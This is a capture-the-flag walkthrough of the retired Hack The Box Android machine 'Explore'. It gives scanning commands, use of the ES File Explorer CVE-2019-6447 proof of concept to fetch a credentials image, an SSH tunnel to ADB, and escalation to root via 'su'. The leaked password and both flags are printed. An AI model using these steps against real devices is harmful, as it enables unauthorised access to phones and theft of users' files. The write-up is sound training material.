Explore

Name: Explore
Release Date: 26 Jun 2021
Retire Date: 30 Oct 2021
OS: Linux
Base Points: Easy - Retired [0]
JoshSH 00 days, 00 hours, 03 mins, 27 seconds
jkr 00 days, 00 hours, 18 mins, 56 seconds
Creator: bertolis
Pentest Workstation PDF: Explore.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.247

Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.

We have SSH (TCP 2222), FREECIV/ADB (TCP 5555), and HTTP Bukkit JSONAPI (TCP 59777) as the major ports to look at right now (the service names are what nmap guessed from the banners). Gobuster found several pages and directories that could be interesting.

gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.247:59777

┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ gobuster dir -u http://10.10.10.247:59777 -w /usr/share/dirb/wordlists/big.txt -o gobusterExplore.out           
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.247:59777
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/17 08:41:32 Starting gobuster in directory enumeration mode
===============================================================
/acct                 (Status: 301) [Size: 65] [--> /acct/]
/bin                  (Status: 301) [Size: 63] [--> /bin/] 
/cache                (Status: 301) [Size: 67] [--> /cache/]
/config               (Status: 301) [Size: 69] [--> /config/]
/d                    (Status: 301) [Size: 59] [--> /d/]     
/data                 (Status: 301) [Size: 65] [--> /data/]  
/dev                  (Status: 301) [Size: 63] [--> /dev/]   
/etc                  (Status: 301) [Size: 63] [--> /etc/]   
/init                 (Status: 403) [Size: 31]               
/lib                  (Status: 301) [Size: 63] [--> /lib/]   
/mnt                  (Status: 301) [Size: 63] [--> /mnt/]   
/oem                  (Status: 301) [Size: 63] [--> /oem/]   
/proc                 (Status: 301) [Size: 65] [--> /proc/]  
/product              (Status: 301) [Size: 71] [--> /product/]
/sbin                 (Status: 301) [Size: 65] [--> /sbin/]   
/storage              (Status: 301) [Size: 71] [--> /storage/]
/sys                  (Status: 301) [Size: 63] [--> /sys/]    
/system               (Status: 301) [Size: 69] [--> /system/] 
/vendor               (Status: 301) [Size: 69] [--> /vendor/] 
                                                              
===============================================================
2022/01/17 08:56:26 Finished
===============================================================
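A triage helper for scan output like the listing above, as an added example that is not from the original post: it parses gobuster's result-line format and flags when the discovered top-level paths match a stock Android filesystem root, which is the real signal here that a device is serving its whole filesystem over HTTP. The sample output is constructed from a subset of the listing above, and the 0.5 match threshold is an assumption.

```python
import re

# Top-level directories of a stock Android filesystem root. A web service
# that answers for most of them is serving the device root, not a web app.
ANDROID_ROOT_DIRS = frozenset({
    "acct", "cache", "config", "d", "data", "dev", "etc", "init", "mnt",
    "oem", "proc", "product", "sbin", "storage", "sys", "system", "vendor",
})

# gobuster result line: "/path   (Status: 301) [Size: 65] [--> /path/]"
GOBUSTER_LINE = re.compile(r"^(/\S*)\s+\(Status:\s*(\d{3})\)")

def parse_gobuster(output: str) -> dict:
    """Map each path gobuster reported to its HTTP status code.
    Banner and summary lines do not start with '/' and are skipped."""
    found = {}
    for line in output.splitlines():
        m = GOBUSTER_LINE.match(line.strip())
        if m:
            found[m.group(1).strip("/")] = int(m.group(2))
    return found

def android_root_exposure(found: dict, threshold: float = 0.5) -> dict:
    """Score how closely the discovered paths match an Android root.
    The 0.5 threshold is an assumption, not a published heuristic."""
    hits = sorted(ANDROID_ROOT_DIRS & found.keys())
    coverage = round(len(hits) / len(ANDROID_ROOT_DIRS), 2)
    return {
        "exposed": coverage >= threshold,
        "coverage": coverage,
        "matched": hits,
        # /storage holds user files (photos, downloads), so it matters most
        "user_storage_listed": found.get("storage") == 301,
    }

# Constructed sample: a subset of the gobuster output from the scan above.
SAMPLE_ANDROID = """\
===============================================================
[+] Url:                     http://10.10.10.247:59777
/acct                 (Status: 301) [Size: 65] [--> /acct/]
/data                 (Status: 301) [Size: 65] [--> /data/]
/init                 (Status: 403) [Size: 31]
/oem                  (Status: 301) [Size: 63] [--> /oem/]
/proc                 (Status: 301) [Size: 65] [--> /proc/]
/storage              (Status: 301) [Size: 71] [--> /storage/]
/sys                  (Status: 301) [Size: 63] [--> /sys/]
/system               (Status: 301) [Size: 69] [--> /system/]
/vendor               (Status: 301) [Size: 69] [--> /vendor/]
"""
SAMPLE_WEB = "/images (Status: 301) [Size: 0]\n/admin (Status: 403) [Size: 0]\n"
```

Feeding the constructed Android sample through `android_root_exposure(parse_gobuster(SAMPLE_ANDROID))` reports it as exposed with `/storage` listed, while the ordinary web server sample scores zero.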

Researching 5555 and 59777, we discover ES File Explorer, its information, and its vulnerabilities. Two great resources for those two ports are:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6447

https://github.com/fs0c131y/ESFileExplorerOpenPortVuln

Clone the exploit repo and check the README.md file to see what commands can be run. To save time, the two we need are, in order:

python3 poc.py --ip=10.10.10.247 -c listPics

python3 poc.py --ip=10.10.10.247 -g /storage/emulated/0/DCIM/creds.jpg

Open the creds.jpg file and you'll have Kristi's login credentials. Apparently, having a picture of the quintessential "post-it note" is better than just the post-it note... (PASSWORD MANAGERS!!! I'm better now.) At least it's a halfway decent password, so there's that.

Kristi:Kr1sT!5h@Rp3xPl0r3!

This is obviously a phone, in case the ES File Explorer wasn't clear :D Now we have to figure out how to escalate to the phone's version of root (which, if I recall, is still root). The problem is that normal Linux enumeration scripts aren't going to work correctly AND we still have to find the user.txt flag. Time to go old school manual. After searching the file system, I found a few things. First, there's an SD card in this phone and the user flag is on it!

:/sdcard $ cat user.txt
f32017174c7c7e8f50c6da52891ae250

Now, if you recall, port 5555 (ADB) was filtered, but what if we could use SSH port tunneling to reach it from the inside?

ssh -L 5555:localhost:5555 kristi@10.10.10.247 -p 2222
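A small audit for the sshd side of that tunnel, as an added example that is not from the original post: it reads an sshd_config text and reports whether AllowTcpForwarding would let a client-side -L forward reach a port that is filtered externally, the way 5555 is here. Both sample configs are constructed, and treating Match blocks as report-only is a simplification of mine, not sshd behaviour.

```python
# Values of AllowTcpForwarding that still permit a client-side -L forward.
LOCAL_FORWARD_VALUES = {"yes", "all", "local"}

def tcp_forwarding_allowed(sshd_config: str) -> tuple:
    """Audit the global AllowTcpForwarding setting in an sshd_config text.
    Mirrors two sshd rules: the directive defaults to 'yes' when absent, and
    the first occurrence outside any Match block wins. Match blocks are only
    reported, not evaluated (a simplification). Returns (allowed, notes)."""
    value, notes, in_match = None, [], False
    for raw in sshd_config.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        arg = parts[1].strip().lower() if len(parts) > 1 else ""
        if key == "match":
            in_match = True  # everything after this line is conditional
            notes.append(f"Match block '{arg}' not evaluated")
            continue
        if in_match:
            continue
        if key == "allowtcpforwarding" and value is None:
            value = arg  # first global occurrence is the effective one
    if value is None:
        notes.append("AllowTcpForwarding absent; sshd default is 'yes'")
        return True, notes
    return value in LOCAL_FORWARD_VALUES, notes

# Constructed sample: SSH on 2222 and nothing said about forwarding, so the
# default applies and a -L tunnel like the one above would be accepted.
WEAK_CONFIG = """\
Port 2222
PasswordAuthentication yes
"""

# Constructed sample: forwarding disabled globally. The later 'yes' is
# ignored because the first value wins; the Match block is only reported.
HARDENED_CONFIG = """\
Port 2222
AllowTcpForwarding no
X11Forwarding no
AllowTcpForwarding yes
Match User kristi
    AllowTcpForwarding local
"""
```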

Then we "should" be able to use adb connect through the tunnel to get another shell, hopefully as root, but we'll see.

┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb connect localhost:5555
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to localhost:5555

┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb devices      
List of devices attached
emulator-5554   device
localhost:5555  device

Notice there are two "devices" attached. We need to tell adb (with -s) which one we want the shell on.

┌──(kali㉿kali)-[~/Desktop/HTB/Explore]
└─$ adb -s localhost:5555 shell
x86_64:/ $ whoami
shell
x86_64:/ $ su
:/ # whoami
root

Gotcha!!! Now we search for root.txt and this phone will be toast.

:/ # find / -name root.txt

:/data # cat root.txt
f04fc82b6d49b41c9b08982be59338c5

This was a completely different style of box/phone/thing... But hey, another one down!